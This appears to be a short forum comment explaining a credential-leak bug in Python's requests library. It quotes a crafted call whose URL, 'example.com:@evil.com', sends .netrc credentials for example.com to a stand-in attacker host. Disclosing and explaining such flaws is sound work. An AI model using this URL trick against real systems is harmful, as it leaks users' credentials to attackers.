|
|
|
|
|
|
by pixl97
383 days ago
|
|
|
Execute the call >requests.get('http://example.com:@evil.com/') >Assuming .netrc credentials are configured for example.com, they are leaked to evil.com by the call Instead of having a url parse error it appears to drop the : and use the password:domain format. |
|
|